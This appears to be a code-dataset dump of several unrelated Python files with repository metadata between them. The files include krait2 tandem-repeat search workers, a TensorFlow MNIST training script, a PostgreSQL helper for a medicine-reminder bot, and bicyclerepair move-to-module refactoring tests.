self.new_source = Source('abc-news','ABC news','Your trusted source for breaking news',"https://abcnews.go.com","general","en","us")
def test_instance(self):
self.assertTrue(isinstance(self.new_source,Source))
if __name__ == "__main__":
unittest.main() | 30 | 140 | 0.661111 | 445 | 0.824074 | 0 | 0 | 0 | 0 | 0 | 0 | 253 | 0.468519 |
d5acd000db9d4a9b597057b8dfc5cb47789972b8 | 432 | py | Python | python_backend/custom_types/forvo_api_types.py | BenLeong0/japanese_vocab_fetcher | c441eaf46c7330f9319216a6321ce8ec8d3de6cc | [
"MIT"
] | null | null | null | python_backend/custom_types/forvo_api_types.py | BenLeong0/japanese_vocab_fetcher | c441eaf46c7330f9319216a6321ce8ec8d3de6cc | [
"MIT"
] | 2 | 2021-12-26T23:34:02.000Z | 2021-12-26T23:34:11.000Z | python_backend/custom_types/forvo_api_types.py | BenLeong0/japanese_vocab_fetcher | c441eaf46c7330f9319216a6321ce8ec8d3de6cc | [
"MIT"
] | null | null | null | from typing import Literal, TypedDict
class ForvoAPIItem(TypedDict):
id: int
word: str
original: str
addtime: str
hits: int
username: str
sex: str
country: str
code: str
langname: str
pathmp3: str
pathogg: str
rate: int
num_votes: int
num_positive_votes: int
class ForvoAPIResponse(TypedDict):
attributes: dict[Literal["total"], int]
items: list[ForvoAPIItem]
| 17.28 | 43 | 0.655093 | 388 | 0.898148 | 0 | 0 | 0 | 0 | 0 | 0 | 7 | 0.016204 |
d5ad2c2b6d4e8106ddd532340d0d9a878fb16570 | 16,522 | py | Python | src/workers.py | lmdu/krait2 | 82aff14cdbbb777ea391bcb8acf3cb95b913209a | [
"MIT"
] | 1 | 2021-05-16T08:37:22.000Z | 2021-05-16T08:37:22.000Z | src/workers.py | lmdu/krait2 | 82aff14cdbbb777ea391bcb8acf3cb95b913209a | [
"MIT"
] | null | null | null | src/workers.py | lmdu/krait2 | 82aff14cdbbb777ea391bcb8acf3cb95b913209a | [
"MIT"
] | null | null | null | import os
import csv
import time
import stria
import pyfastx
import traceback
import multiprocessing
from PySide6.QtCore import *
from primer3 import primerdesign
from motif import *
from stats import *
from utils import *
from config import *
from backend import *
from annotate import *
__all__ = [
'SSRSearchThread', 'VNTRSearchThread',
'ISSRSearchThread', 'PrimerDesignThread',
'SaveProjectThread', 'ExportSelectedRowsThread',
'ExportWholeTableThread', 'ExportAllTablesThread',
'TRELocatingThread', 'StatisticsThread'
]
class WorkerSignal(QObject):
progress = Signal(int)
messages = Signal(str)
errors = Signal(str)
finished = Signal()
status = Signal(int)
class WorkerThread(QThread):
def __init__(self, parent=None):
super().__init__(parent)
self.parent = parent
self.search_all = parent.search_all
self.signals = WorkerSignal()
self.signals.progress.connect(parent.change_progress)
self.signals.messages.connect(parent.show_status_message)
self.signals.errors.connect(parent.show_error_message)
self.signals.status.connect(parent.change_task_status)
#self.signals.finished.connect(self.deleteLater)
self.settings = QSettings()
def error(self):
errmsg = traceback.format_exc()
self.signals.errors.emit(errmsg)
print(errmsg)
def process(self):
pass
def run(self):
self.signals.progress.emit(0)
try:
self.process()
except:
self.error()
self.signals.progress.emit(100)
#self.signals.messages.emit('Finished!')
self.signals.finished.emit()
class SearchThread(WorkerThread):
_table = ''
def __init__(self, parent=None):
super().__init__(parent)
self.findex = 0
self.batch = 100
@property
def table(self):
return "{}_{}".format(self._table, self.findex)
@property
def fastas(self):
if not self.search_all:
selected = sorted(self.parent.file_table.get_selected_rows())
else:
selected = []
self.total_file = DB.get_one("SELECT COUNT(1) FROM fasta_0 LIMIT 1")
if self.search_all or len(selected) == self.total_file:
for fasta in DB.query("SELECT * FROM fasta_0"):
yield fasta
else:
self.total_file = len(selected)
slice_start = 0
slice_end = 0
while slice_start < self.total_file:
slice_end = slice_start + self.batch
ids = selected[slice_start:slice_end]
slice_start = slice_end
sql = "SELECT * FROM fasta_0 WHERE id IN ({})".format(','.join(['?']*len(ids)))
for fasta in DB.query(sql, ids):
yield fasta
def sql(self):
self.columns = len(DB.get_field(self.table)) - 1
return "INSERT INTO {} VALUES (NULL{})".format(
self.table,
",?" * self.columns
)
def args(self, name, seq):
return (name, seq)
@staticmethod
def search(*args):
pass
def rows(self, trs):
pass
def process(self):
progress = 0
processed_size = 0
processed_file = 0
with multiprocessing.Pool(1) as pool:
for fasta in self.fastas:
self.findex = fasta[0]
total_size = fasta[2]
#create ssr table for current file
DB.create_table(self._table, self.findex)
self.change_status('running')
seqs = pyfastx.Fastx(fasta[4], uppercase=True)
sql = self.sql()
for name, seq, _ in seqs:
self.signals.messages.emit('processing sequence {} in file {}'.format(name, fasta[1]))
proc = pool.apply_async(self.search, self.args(name, seq))
trs = proc.get()
DB.insert_rows(sql, self.rows(trs))
processed_size += len(seq)
if processed_size > total_size:
r = 0
else:
r = processed_size/total_size
p = int((processed_file + r)/self.total_file*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
processed_file += 1
self.change_status('success')
def error(self):
self.signals.errors.emit(traceback.format_exc())
self.change_status('failure')
def change_status(self, status):
DB.update_status(self.findex, status)
self.signals.status.emit(self.findex)
class SSRSearchThread(SearchThread):
_table = 'ssr'
def __init__(self, parent):
super().__init__(parent)
self.settings.beginGroup("SSR")
self.min_repeats = [
self.settings.value('mono', 12, int),
self.settings.value('di', 7, int),
self.settings.value('tri', 5, int),
self.settings.value('tetra', 4, int),
self.settings.value('penta', 4, int),
self.settings.value('hexa', 4, int)
]
self.settings.endGroup()
standard_level = self.settings.value('STR/level', 3, type=int)
self.motifs = StandardMotif(standard_level)
def args(self, name, seq):
return (name, seq, self.min_repeats)
@staticmethod
def search(*args):
return stria.SSRMiner(*args).as_list()
def rows(self, ssrs):
for ssr in ssrs:
row = [ssr[0], ssr[1], ssr[2], ssr[3], self.motifs.standard(ssr[3]),
iupac_numerical_multiplier(ssr[4]), ssr[5], ssr[6]]
yield row
class CSSRSearchThread(SearchThread):
_table = 'cssr'
def __init__(self, parent):
super().__init__(parent)
params = ['SSR/mono', 'SSR/di', 'SSR/tri', 'SSR/tetra', 'SSR/penta', 'SSR/hexa']
self.min_repeats = []
for param in params:
default, func = KRAIT_PARAMETERS[param]
self.min_repeats.append(self.settings.value(param, default, func))
default, func = KRAIT_PARAMETERS['CSSR/dmax']
self.dmax = self.settings.value('CSSR/dmax', default, func)
def args(self, name, seq):
return (name, seq, self.min_repeats)
@staticmethod
def search(*args):
return stria.SSRMiner(*args).as_list()
'''
def rows(self, ssrs):
cssrs = [next(ssrs)]
for ssr in ssrs:
dmax = ssr[1] - cssrs[-1][2] - 1
if dmax <= self.dmax:
cssrs.append(ssr)
else:
if len(cssrs) > 1:
pass
cssrs = [ssr]
if len(cssrs) > 1:
self.
def adjacent_join(self, cssrs):
return (cssrs[0][0], cssrs[0][1], cssrs[-1][2], len(cssrs),
cssrs[-1][2] - cssrs[0][1] + 1,
"{}-{}".format(cssrs[0])
)
'''
class VNTRSearchThread(SearchThread):
_table = 'vntr'
def __init__(self, parent):
super().__init__(parent)
self.params = []
params = ['VNTR/minmotif', 'VNTR/maxmotif', 'VNTR/minrep']
for param in params:
default, func = KRAIT_PARAMETERS[param]
self.params.append(self.settings.value(param, default, func))
def args(self, name, seq):
return (name, seq, *self.params)
@staticmethod
def search(*args):
return stria.VNTRMiner(*args).as_list()
def rows(self, vntrs):
for vntr in vntrs:
row = list(vntr)
row[4] = iupac_numerical_multiplier(row[4])
yield row
class ISSRSearchThread(SearchThread):
_table = 'issr'
def __init__(self, parent):
super().__init__(parent)
self.params = [1, 6]
params = ['ISSR/minsrep', 'ISSR/minslen', 'ISSR/maxerr',
'ISSR/subpena', 'ISSR/inspena', 'ISSR/delpena',
'ISSR/matratio', 'ISSR/maxextend']
for param in params:
default, func = KRAIT_PARAMETERS[param]
self.params.append(self.settings.value(param, default, func))
standard_level = self.settings.value('STR/level', 3, type=int)
self.motifs = StandardMotif(standard_level)
def args(self, name, seq):
return (name, seq, *self.params)
@staticmethod
def search(*args):
return stria.ITRMiner(*args).as_list()
def rows(self, issrs):
for issr in issrs:
row = issr[0:4]
row.append(self.motifs.standard(issr[3]))
row.append(iupac_numerical_multiplier(ssr[4]))
row.extend(issr[5:])
yield row
class PrimerDesignThread(WorkerThread):
def __init__(self, parent=None, table=None):
super().__init__(parent)
self.batch = 100
#current table is tandem repeat table, not primer table
self.table, self.findex = table.split('_')
param = "STR/flank"
default, func = KRAIT_PARAMETERS[param]
self.flank_len = self.settings.value(param, default, func)
self._sql = "SELECT * FROM {} WHERE id IN ({})".format(table, ','.join(['?']*self.batch))
self._isql = "INSERT INTO primer_{} VALUES (NULL{})".format(self.findex, ',?'*15)
DB.create_table('primer', self.findex)
DB.clear_table('primer', self.findex)
self.read_primer_settings()
def read_primer_settings(self):
self.primer_tags = {}
self.settings.beginGroup("PRIMER")
for k in self.settings.allKeys():
default, func = primer_tag_format(k)
self.primer_tags[k] = self.settings.value(k, default, func)
self.settings.endGroup()
if not self.primer_tags:
for param in PRIMER_COMMONS:
default, _ = PRIMER_PARAMETERS[param]
self.primer_tags = default
size_ranges = self.primer_tags['PRIMER_PRODUCT_SIZE_RANGE']
self.primer_tags['PRIMER_PRODUCT_SIZE_RANGE'] = product_size_format(size_ranges)
self.primer_tags['PRIMER_TASK'] = 'generic'
self.primer_tags['PRIMER_PICK_LEFT_PRIMER'] = 1
self.primer_tags['PRIMER_PICK_INTERNAL_OLIGO'] = 0
self.primer_tags['PRIMER_PICK_RIGHT_PRIMER'] = 1
def sql(self, num):
if num == self.batch:
return self._sql
else:
return "SELECT * FROM {}_{} WHERE id IN ({})".format(self.table, self.findex, ','.join(['?']*num))
def process(self):
#get fasta file path
fasta_file = DB.get_one("SELECT fasta FROM fasta_0 WHERE id=?", self.findex)
fasta = pyfastx.Fasta(fasta_file, uppercase=True)
primerdesign.setGlobals(self.primer_tags, None, None)
selected = sorted(self.parent.get_selected_rows())
total = len(selected)
processed = 0
progress = 0
slice_start = 0
slice_end = 0
while slice_start < total:
slice_end = slice_start + self.batch
ids = selected[slice_start:slice_end]
slice_start = slice_end
primer_list = []
for tr in DB.query(self.sql(len(ids)), ids):
tr_start = tr[2] - self.flank_len
if tr_start < 1:
tr_start = 1
tr_end = tr[3] + self.flank_len
if tr_end > len(fasta[tr[1]]):
tr_end = len(fasta[tr[1]])
tr_seq = fasta.fetch(tr[1], (tr_start, tr_end))
tr_len = tr[3] - tr[2] + 1
locus = "{}.{}.{}".format(self.table, self.findex, tr[0])
primerdesign.setSeqArgs({
'SEQUENCE_ID': locus,
'SEQUENCE_TEMPLATE': tr_seq,
'SEQUENCE_TARGET': [tr[2]-tr_start, tr_len]
})
res = primerdesign.runDesign(False)
if res:
primer_count = res['PRIMER_PAIR_NUM_RETURNED']
for i in range(primer_count):
primer_info = [locus, i+1,
res['PRIMER_PAIR_%s_PRODUCT_SIZE' % i],
res['PRIMER_LEFT_%s_SEQUENCE' % i],
round(res['PRIMER_LEFT_%s_TM' % i], 2),
round(res['PRIMER_LEFT_%s_GC_PERCENT' % i], 2),
round(res['PRIMER_LEFT_%s_END_STABILITY' % i], 2),
res['PRIMER_RIGHT_%s_SEQUENCE' % i],
round(res['PRIMER_RIGHT_%s_TM' % i], 2),
round(res['PRIMER_RIGHT_%s_GC_PERCENT' % i], 2),
round(res['PRIMER_RIGHT_%s_END_STABILITY' % i], 2),
]
primer_info.extend(res['PRIMER_LEFT_%s' % i])
primer_info.extend(res['PRIMER_RIGHT_%s' % i])
primer_list.append(primer_info)
if primer_list:
DB.insert_rows(self._isql, primer_list)
processed += len(ids)
p = int(processed/total*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
class SaveProjectThread(WorkerThread):
def __init__(self, parent=None, save_file=None):
super().__init__(parent)
self.save_file = save_file
def process(self):
self.signals.messages.emit("Saving to {}".format(self.save_file))
progress = 0
#close transaction
DB.commit()
with DB.save_to_file(self.save_file) as backup:
while not backup.done:
backup.step(10)
p = int((backup.pagecount - backup.remaining)/backup.pagecount*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
self.signals.messages.emit("Successfully saved to {}".format(self.save_file))
class ExportSelectedRowsThread(WorkerThread):
def __init__(self, parent=None, table=None, out_file=None):
super().__init__(parent)
self.table = table
self.out_file = out_file
self.batch = 100
def process(self):
selected = sorted(self.parent.get_selected_rows())
title = DB.get_field(self.table)
total = len(selected)
processed = 0
progress = 0
slice_start = 0
slice_end = 0
if self.out_file.endswith('.csv'):
separator = ','
else:
separator = '\t'
with open(self.out_file, 'w') as fh:
writer = csv.writer(fh, delimiter=separator)
writer.writerow(title)
while slice_start < total:
slice_end = slice_start + self.batch
ids = selected[slice_start:slice_end]
slice_start = slice_end
sql = "SELECT * FROM {} WHERE id IN ({})".format(self.table, ','.join(['?']*len(ids)))
for row in DB.query(sql, ids):
writer.writerow(row)
processed += len(ids)
p = int(processed/total*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
self.signals.messages.emit("Successfully exported {} rows to {}".format(total, self.out_file))
class ExportWholeTableThread(WorkerThread):
def __init__(self, parent=None, table=None, out_file=None):
super().__init__(parent)
self.table = table
self.out_file = out_file
def process(self):
title = DB.get_field(self.table)
total = DB.get_one("SELECT COUNT(1) FROM {}".format(self.table))
processed = 0
progress = 0
if self.out_file.endswith('.csv'):
separator = ','
else:
separator = '\t'
with open(self.out_file, 'w') as fh:
writer = csv.writer(fh, delimiter=separator)
writer.writerow(title)
for row in DB.query("SELECT * FROM {}".format(self.table)):
writer.writerow(row)
processed += 1
p = int(processed/total*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
self.signals.messages.emit("Successfully exported the whole table to {}".format(total, self.out_file))
class ExportAllTablesThread(WorkerThread):
def __init__(self, parent=None, out_dir=None):
super().__init__(parent)
self.out_dir = out_dir
def process(self):
tables = DB.get_tables()
total = len(tables)
processed = 0
progress = 0
#get fasta name and id mapping
fasta_mapping = {}
for row in DB.query("SELECT id, name FROM fasta_0"):
fasta_mapping[str(row[0])] = row[1]
for table in tables:
if table == 'fasta_0':
out_file = os.path.join(self.out_dir, 'input_fastas.csv')
else:
_type, _id = table.split('_')
out_file = os.path.join(self.out_dir, '{}_{}.csv'.format(
fasta_mapping[_id], _type
))
DB.export_to_csv(table, out_file)
processed += 1
p = processed/total*100
if p > progress:
self.signals.progress.emit(p)
progress = p
class TRELocatingThread(SearchThread):
_table = 'locate'
def __init__(self, parent=None):
super().__init__(parent)
self.type_mapping = {'ssr': 1, 'cssr': 2,
'vntr': 3, 'itr': 4}
def process(self):
progress = 0
processed = 0
for fasta in self.fastas:
self.findex = fasta[0]
self.change_status('running')
annot_file = fasta[5]
if not annot_file:
continue
tre_types = {
'ssr': DB.get_count("ssr_{}".format(self.findex)),
'vntr': DB.get_count("vntr_{}".format(self.findex)),
'cssr': DB.get_count("cssr_{}".format(self.findex)),
'itr': DB.get_count("itr_{}".format(self.findex))
}
if any(tre_types.values()):
#parse annotation file
locator = annotation_parser(annot_file)
#build index
locator.index()
else:
continue
#create annotation table for current file
DB.create_table(self._table, self.findex)
for tre_type in tre_types:
if not tre_types[tre_type]:
continue
feat_id = self.type_mapping[tre_type]
tre_annots = []
for tre in DB.query("SELECT * FROM {}_{}".format(tre_type, self.findex)):
locs = locator.locate(tre[1], tre[2], tre[3])
for loc in locs:
tre_annots.append((tre[0], feat_id, *loc))
if tre_annots:
DB.insert_rows(self.sql(), tre_annots)
class StatisticsThread(WorkerThread):
def __init__(self, parent=None):
super().__init__(parent)
@property
def fastas(self):
if not self.search_all:
selected = sorted(self.parent.file_table.get_selected_rows())
else:
selected = []
self.total_file = DB.get_one("SELECT COUNT(1) FROM fasta_0 LIMIT 1")
if self.search_all or len(selected) == self.total_file:
for fasta in DB.query("SELECT id FROM fasta_0"):
yield fasta[0]
else:
for _id in selected:
return _id
def process(self):
for fasta_id in self.fastas:
#create stats result table
DB.create_table('stats', fasta_id)
#perform fasta general stats
self.signals.messages.emit("Extracting fasta file information...")
FastaStatistics(fasta_id)
#perform ssr stats
if DB.table_exists('ssr_{}'.format(fasta_id)):
self.signals.messages.emit("Performing SSR statistics...")
SSRStatistics(fasta_id)
| 25.937206 | 104 | 0.678308 | 15,961 | 0.966045 | 1,589 | 0.096175 | 1,526 | 0.092362 | 0 | 0 | 2,827 | 0.171105 |
d5ad529e55fa638ad8a24b07f5e82913bca91ecd | 3,327 | py | Python | src/deepnnmnist/deepnn-nobias/linear_deep_nn_nobias_no_activationf.py | renaudbougues/continuous-deep-q-learning | a96e1d9019a7291cc937de37404f2af71eaa2e32 | [
"MIT"
] | 1 | 2016-08-02T17:22:33.000Z | 2016-08-02T17:22:33.000Z | src/deepnnmnist/deepnn-nobias/linear_deep_nn_nobias_no_activationf.py | renaudbougues/continuous-deep-q-learning | a96e1d9019a7291cc937de37404f2af71eaa2e32 | [
"MIT"
] | 6 | 2016-10-02T00:18:52.000Z | 2016-10-02T00:22:59.000Z | src/deepnnmnist/deepnn-nobias/linear_deep_nn_nobias_no_activationf.py | renaudbougues/continuous-deep-q-learning | a96e1d9019a7291cc937de37404f2af71eaa2e32 | [
"MIT"
] | null | null | null | '''
Training a deep "incomplete" ANN on MNIST with Tensorflow
The ANN has no bias and no activation function
This function does not learn very well because the the hypothesis is completely off
The loss function is bad. The network is unstable in training (easily blow up) and
fails to learn the training dataset (<20% accuracy on training dataset)
'''
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Parameters
n_epoch = 100
n_features = 784
n_examples = None
n_hidden_units_1 = 10
n_hidden_units_2 = 5
n_outputs = 10
learning_rate = .001
mini_batch_size = 50
# Fetch the mnist data
def fetch():
return input_data.read_data_sets('MNIST_data', one_hot = True)
# Define the model
# Model inputs & outputs definition
xx = tf.placeholder(tf.float32, shape=(n_examples, n_features), name = "MyInputs")
yy = tf.placeholder(tf.float32, shape=(n_examples, n_outputs), name = "MyLabels")
# Model hypothesis
ww_1 = tf.Variable(tf.truncated_normal(shape=(n_features, n_hidden_units_1), stddev = .05, dtype=tf.float32), name = "MyWeights_1", trainable=True)
ww_2 = tf.Variable(tf.truncated_normal(shape=(n_hidden_units_1, n_hidden_units_2), stddev = .05, dtype=tf.float32), name = "MyWeights_2", trainable=True)
ww_3 = tf.Variable(tf.truncated_normal(shape=(n_hidden_units_2, n_outputs), stddev = .05, dtype=tf.float32), name = "MyWeights_final", trainable=True)
aa_1 = tf.matmul(xx, ww_1)
#tf.nn.softmax(tf.matmul(xx, ww_1) + bb_1)
aa_2 = tf.matmul(aa_1, ww_2)
predict_yy = tf.matmul(aa_2, ww_3)
# Evaluate the loss
loss = tf.reduce_sum(tf.squared_difference(predict_yy, yy, "MyLoss"))
# Train the model / Apply gradient updates (One Step)
# Calculate gradient of the loss for each weight
# + Update each weight
opt = tf.train.GradientDescentOptimizer(learning_rate)
minimizer = opt.minimize(loss)
# Evaluate the model against the test data. Test the model
def eval(inputs):
return tf.matmul(inputs, ww)
# Init variables
init = tf.initialize_all_variables()
tf.scalar_summary("Loss", tf.reduce_mean(loss))
tf.scalar_summary("Weight1", tf.reduce_mean(ww_1))
tf.scalar_summary("Weight2", tf.reduce_mean(ww_2))
tf.scalar_summary("Weight3", tf.reduce_mean(ww_3))
merged = tf.merge_all_summaries()
def main():
print "Running %s" % __file__
mnist = fetch()
#tf.is_variable_initialized(ww)
with tf.Session() as sess:
# Create a summary writer, add the 'graph' to the event file.
writer = tf.train.SummaryWriter(".", sess.graph)
init.run()
for epoch in range(n_epoch):
batch = mnist.train.next_batch(mini_batch_size)
summaries, _, loss_val =sess.run([merged, minimizer, loss], feed_dict={xx: batch[0], yy: batch[1]})
print "run epoch {:d}: loss value is {:f}".format(epoch, loss_val)
#print summaries
writer.add_summary(summaries,epoch)
correct_prediction = tf.equal(tf.argmax(yy,1), tf.argmax(predict_yy,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
accuracy_val = accuracy.eval(feed_dict={xx: mnist.test.images, yy: mnist.test.labels})
print "\naccuracy is {:f}".format(accuracy_val*100)
# print eval(test_data)
if __name__ == '__main__': main()
| 34.298969 | 153 | 0.709047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,046 | 0.314397 |
d5ade4b8467958efc5bf0dd674d19bc8f2a64b86 | 416 | py | Python | tests/conftest.py | Usetech/labelgun | 0a3293cae3179b7d4e324154d0335d7d81a8455e | [
"MIT"
] | null | null | null | tests/conftest.py | Usetech/labelgun | 0a3293cae3179b7d4e324154d0335d7d81a8455e | [
"MIT"
] | null | null | null | tests/conftest.py | Usetech/labelgun | 0a3293cae3179b7d4e324154d0335d7d81a8455e | [
"MIT"
] | null | null | null | import pytest
import structlog
@pytest.fixture(autouse=True)
def setup():
structlog.configure(
processors=[
structlog.processors.JSONRenderer(ensure_ascii=False),
],
context_class=structlog.threadlocal.wrap_dict(dict),
logger_factory=structlog.stdlib.LoggerFactory(),
wrapper_class=structlog.stdlib.BoundLogger,
cache_logger_on_first_use=True,
)
| 26 | 66 | 0.699519 | 0 | 0 | 0 | 0 | 382 | 0.918269 | 0 | 0 | 0 | 0 |
d5aeb7169dd5488c77699e15ae16e978f40d715e | 3,271 | py | Python | lib/db_manager.py | kevin20888802/liang-medicine-line-bot-py | 07f63759e63272460f5ecfb0ce8fd6ed62b50e1c | [
"Apache-2.0"
] | null | null | null | lib/db_manager.py | kevin20888802/liang-medicine-line-bot-py | 07f63759e63272460f5ecfb0ce8fd6ed62b50e1c | [
"Apache-2.0"
] | null | null | null | lib/db_manager.py | kevin20888802/liang-medicine-line-bot-py | 07f63759e63272460f5ecfb0ce8fd6ed62b50e1c | [
"Apache-2.0"
] | null | null | null | import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
import os
import urllib.parse as urlparse
class PostgresBaseManager:
def __init__(self,local):
self.database = 'postgres'
self.user = 'postgres'
self.password = '1234'
self.host = 'localhost'
self.port = '5432'
self.localTest = local
self.conn = self.connect()
self.setupSQLCMD = """-- 使用者藥品表
--Drop Table If Exists UserMedicine;
Create Table If Not Exists UserMedicine
(
ID int GENERATED ALWAYS AS IDENTITY Primary Key,
UserID varchar(1024),
MedicineName varchar(1024),
Amount int,
TakeAmount int
);
-- 提醒時間表
--Drop Table If Exists Notify;
Create Table If Not Exists Notify
(
ID int GENERATED ALWAYS AS IDENTITY Primary Key,
UserID varchar(1024),
Description text,
TargetMedicine varchar(1024),
TargetTime varchar(128),
LastNotifyDate varchar(512),
TakeDate varchar(512)
);
-- 吃藥紀錄表
--Drop Table If Exists TakeMedicineHistory;
Create Table If Not Exists TakeMedicineHistory
(
ID int GENERATED ALWAYS AS IDENTITY Primary Key,
UserID varchar(1024),
Description text,
AnwTime varchar(128)
);
-- 使用者狀態表
--Drop Table If Exists UserStatus;
Create Table If Not Exists UserStatus
(
UserID varchar(1024) Primary Key,
Stat varchar(1024),
TempValue text
);
"""
pass
def connect(self):
"""
:return: 連接 Heroku Postgres SQL 認證用
"""
if self.localTest == True:
conn = psycopg2.connect(
database=self.database,
user=self.user,
password=self.password,
host=self.host,
port=self.port)
conn.autocommit = True
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
return conn
else:
DATABASE_URL = os.environ['DATABASE_URL']
conn = psycopg2.connect(DATABASE_URL, sslmode='require')
conn.autocommit = True
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
return conn
pass
pass
def disconnect(self):
"""
:return: 關閉資料庫連線使用
"""
self.conn.close()
pass
def testConnection(self):
"""
:return: 測試是否可以連線到 Heroku Postgres SQL
"""
print("testing connection...")
cur = self.conn.cursor()
cur.execute('SELECT VERSION()')
results = cur.fetchall()
print("Database version : {0} ".format(results))
self.conn.commit()
cur.close()
pass
# 執行 sql 指令
def execute(self,cmd):
self.conn = self.connect()
cur = self.conn.cursor()
cur.execute(cmd)
self.conn.commit()
if cmd.startswith("Select") and (cur.rowcount > 0):
results = cur.fetchall()
cur.close()
return results
else:
return None
pass
pass
# 執行 sql 檔案
def executeFile(self,path):
self.conn = self.connect()
cur = self.conn.cursor()
sql_file = open(path,'r',encoding="utf-8")
print("running sql file:" + path)
cur.execute(sql_file.read())
self.conn.commit()
pass
pass | 25.356589 | 68 | 0.595537 | 3,254 | 0.963577 | 0 | 0 | 0 | 0 | 0 | 0 | 1,416 | 0.419307 |
d5af5a629e72cd72e0929e6e0460c5c839714274 | 6,763 | py | Python | bike/refactor/test_moveToModule.py | debiancn/bicyclerepair | dd054e802d6d8ad80baeccee0396da68144f2a26 | [
"ICU"
] | 2 | 2020-05-29T06:31:53.000Z | 2020-12-19T21:49:25.000Z | bike/refactor/test_moveToModule.py | debiancn/bicyclerepair | dd054e802d6d8ad80baeccee0396da68144f2a26 | [
"ICU"
] | null | null | null | bike/refactor/test_moveToModule.py | debiancn/bicyclerepair | dd054e802d6d8ad80baeccee0396da68144f2a26 | [
"ICU"
] | null | null | null | #!/usr/bin/env python
import setpath
from bike.testutils import *
from bike.transformer.save import save
from moveToModule import *
class TestMoveClass(BRMTestCase):
def test_movesTheText(self):
src1=trimLines("""
def before(): pass
class TheClass:
pass
def after(): pass
""")
src1after=trimLines("""
def before(): pass
def after(): pass
""")
src2after=trimLines("""
class TheClass:
pass
""")
try:
createPackageStructure(src1, "")
moveClassToNewModule(pkgstructureFile1,2,
pkgstructureFile2)
save()
self.assertEqual(src1after,file(pkgstructureFile1).read())
self.assertEqual(src2after,file(pkgstructureFile2).read())
finally:
removePackageStructure()
class TestMoveFunction(BRMTestCase):
def test_importsNameReference(self):
src1=trimLines("""
a = 'hello'
def theFunction(self):
print a
""")
src2after=trimLines("""
from a.foo import a
def theFunction(self):
print a
""")
self.helper(src1, src2after)
def test_importsExternalReference(self):
src0=("""
a = 'hello'
""")
src1=trimLines("""
from top import a
def theFunction(self):
print a
""")
src2after=trimLines("""
from top import a
def theFunction(self):
print a
""")
try:
createPackageStructure(src1, "", src0)
moveFunctionToNewModule(pkgstructureFile1,2,
pkgstructureFile2)
save()
self.assertEqual(src2after,file(pkgstructureFile2).read())
finally:
removePackageStructure()
def test_doesntImportRefCreatedInFunction(self):
src1=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
src2after=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
self.helper(src1, src2after)
def test_doesntImportRefCreatedInFunction(self):
src1=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
src2after=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
self.helper(src1, src2after)
def test_addsImportStatementToOriginalFileIfRequired(self):
src1=trimLines("""
def theFunction(self):
pass
b = theFunction()
""")
src1after=trimLines("""
from a.b.bah import theFunction
b = theFunction()
""")
try:
createPackageStructure(src1,"")
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile2)
save()
self.assertEqual(src1after,file(pkgstructureFile1).read())
finally:
removePackageStructure()
def test_updatesFromImportStatementsInOtherModules(self):
src0=trimLines("""
from a.foo import theFunction
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
""")
src0after=trimLines("""
from a.b.bah import theFunction
print theFunction()
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile2)
save()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def test_updatesFromImportMultiplesInOtherModules(self):
src0=trimLines("""
from a.foo import something,theFunction,somethingelse #comment
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
something = ''
somethingelse = 0
""")
src0after=trimLines("""
from a.foo import something,somethingelse #comment
from a.b.bah import theFunction
print theFunction()
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile2)
save()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def test_updatesFromImportMultiplesInTargetModule(self):
src0=trimLines("""
from a.foo import something,theFunction,somethingelse #comment
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
something = ''
somethingelse = 0
""")
src0after=trimLines("""
from a.foo import something,somethingelse #comment
print theFunction()
def theFunction(self):
pass
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile0)
save()
#print file(pkgstructureFile0).read()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def test_updatesFromImportInTargetModule(self):
src0=trimLines("""
from a.foo import theFunction
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
""")
src0after=trimLines("""
print theFunction()
def theFunction(self):
pass
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile0)
save()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def helper(self, src1, src2after):
try:
createPackageStructure(src1, "")
moveFunctionToNewModule(pkgstructureFile1,2,
pkgstructureFile2)
save()
self.assertEqual(src2after,file(pkgstructureFile2).read())
finally:
removePackageStructure()
if __name__ == "__main__":
unittest.main()
| 27.946281 | 70 | 0.530534 | 6,560 | 0.969984 | 0 | 0 | 0 | 0 | 0 | 0 | 2,452 | 0.362561 |
6334d71222020c31513865a447513d22aaed19c8 | 924 | py | Python | src/ggrc_risks/migrations/versions/20170823162755_5aa9ec7105d1_add_test_plan_field.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/ggrc_risks/migrations/versions/20170823162755_5aa9ec7105d1_add_test_plan_field.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
